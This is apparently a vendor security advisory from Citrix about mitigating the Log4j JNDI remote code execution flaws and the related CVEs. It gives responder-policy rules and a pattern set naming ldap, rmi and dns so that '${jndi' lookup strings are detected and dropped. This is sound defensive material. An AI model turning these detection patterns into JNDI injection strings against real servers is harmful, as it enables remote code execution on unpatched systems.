A zero-day exploit affecting the Apache Log4j version from 2.0-beta9 to 2.14.1 was made public on December 9, 2021, as to which JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. As a result, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Citrix recommends that customers follow Apache’s recommendations. In addition, Citrix Web App Firewall (WAF) customers should consider the following recommendations to improve the security of their applications from this vulnerability.

Citrix research team has released updated Citrix WAF signatures designed to mitigate in part the CVE-2021-44228 vulnerability. If you are using any of these Log4j versions (from 2.0-beta9 to 2.14.1), Citrix strongly recommends that you download the signatures version 73 and apply to your Citrix WAF deployments as an additional layer of protection for your applications. Signatures are compatible with the following software versions of Citrix Application Delivery Controller (ADC) 11.1, 12.0, 12.1, 13.0 and 13.1. Please note, version 12.0 is End of Life. Learn more about the release life cycle at https://www.citrix.com/support/product-lifecycle/product-matrix.html.

If you are already using Citrix WAF with signatures with auto-update feature enabled, you may follow these steps after verifying that the signature version is at least version 73.

  1. Search your signatures for CVE-2021-44228 LogString.
  2. Select the results.
  3. Choose “Enable Rules” and click OK.
Click image to view larger.

Citrix ADC Standard and Advanced edition customers, as well as Premium edition customers who do not have WAF signatures enabled, can use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global).

add policy patset patset_cve_2021_44228
bind policy patset patset_cve_2021_44228 ldap
bind policy patset patset_cve_2021_44228 http
bind policy patset patset_cve_2021_44228 https
bind policy patset patset_cve_2021_44228 ldaps
bind policy patset patset_cve_2021_44228 rmi
bind policy patset patset_cve_2021_44228 dns
add responder policy mitigate_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP

Citrix recommends Citrix WAF customers to use the latest signature version, enable signatures auto-update and subscribe to receive signature alert notifications. Citrix will continue to monitor this dynamic situation and update as new mitigations become available.


Update 1 (December 15, 2021)

If any of your application availability is inadvertently impacted due to false positives resulting from above mentioned mitigation policies, Citrix recommends the following modifications to the policy. Please note that any end point covered by the exception_list may expose those assets to the risks from CVE-2021-44228.

  1. Modifications to Responder Policy

add policy patset exception_list
# (Example: bind policy patset exception_list "/exception_url")

set responder policy mitigate_exploit_cve_2021_44228 -rule q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && (HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228"))^

  1. Modifications to WAF Policy

add policy patset exception_list
# (Example: bind policy patset exception_list "/exception_url")

Prepend the existing WAF policy with HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT
# (Example :  set appfw policy my_WAF_policy q^HTTP.REQ.URL.CONTAINS_ANY("exception_list").NOT && <existing rule>^

Update 2 (December 15, 2021)

A second Log4j vulnerability was reported on December 14 — CVE-2021-45046 — rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0.

Citrix recommendations for CVE-2021-44228 with WAF Signatures version 73 and Responder policies, will also mitigate the CVE-2021-45046 vulnerability.

Update 3 (December 19, 2021)
Another Log4j vulnerability was reported on December 18 (CVE-2021-45105) that affects Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3).

Citrix recommendations for CVE-2021-44228/CVE-2021-45046 with WAF Signatures version 73 and Responder policies will also mitigate the CVE-2021-45105 vulnerability exploits.

Update 4 (December 24, 2021)

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

Citrix recommendations for CVE-2021-44228/CVE-2021-45046/CVE-2021-45105 with WAF Signatures version 73 and Responder policies have been validated against the above mentioned CISA Apache Scanner to mitigate vulnerability exploits.

The current WAF signatures version 74 includes regular updates not related to Log4j vulnerabilities.

Update 5 (February 9, 2022)
Another critical Log4j vulnerability with score 9.8 was reported on January 18th  - CVE-2022-23305 that affects Log4j versions from 1.2 to 1.2.17.
 
Citrix recommends to enable SQL Injection Protection in WAF configuration to mitigate the CVE-2022-23305 vulnerability exploits. For customers on software release versions 13.0 and 13.1 Citrix recommends to enable SQL Grammar-based protection. 

Please note, an ADC firmware upgrade is not required for any of the above mentioned Log4j mitigations. However, if for any other reason a new ADC build is needed, please use the following latest builds – 13.1.12.51, 13.0.84.11 or 12.1.63.24. In case any older build is installed post creating the protection with WAF signatures, please update WAF signatures to the latest version and ensure that the required signatures are enabled.

Citrix will continue to update this advisory for CVE-2021-45105 as additional information becomes available.

Additional Information

Citrix WAF has a single code base across physical, virtual, bare-metal, and containers that brings consistency to your deployment model. This signature update applies to all form factors and deployment models of Citrix WAF.

To learn more about Citrix Web App Firewall, see https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/introduction-to-citrix-web-app-firewall.html.

To learn more about Citrix Web App Firewall signature, check out our alert articles and bot signature articles.

To learn about the signature alert notification, go to https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/signature-alerts/how-to-receive-signature-alert.html.

Patches and Mitigations

Citrix strongly recommends that customers consider the security guidance from vendors of other products that they may have deployed. Until a patch is made available, you may reduce the risk of a successful attack by applying mitigations. Mitigations should not be considered full solutions as they do not fully address the underlying issue(s).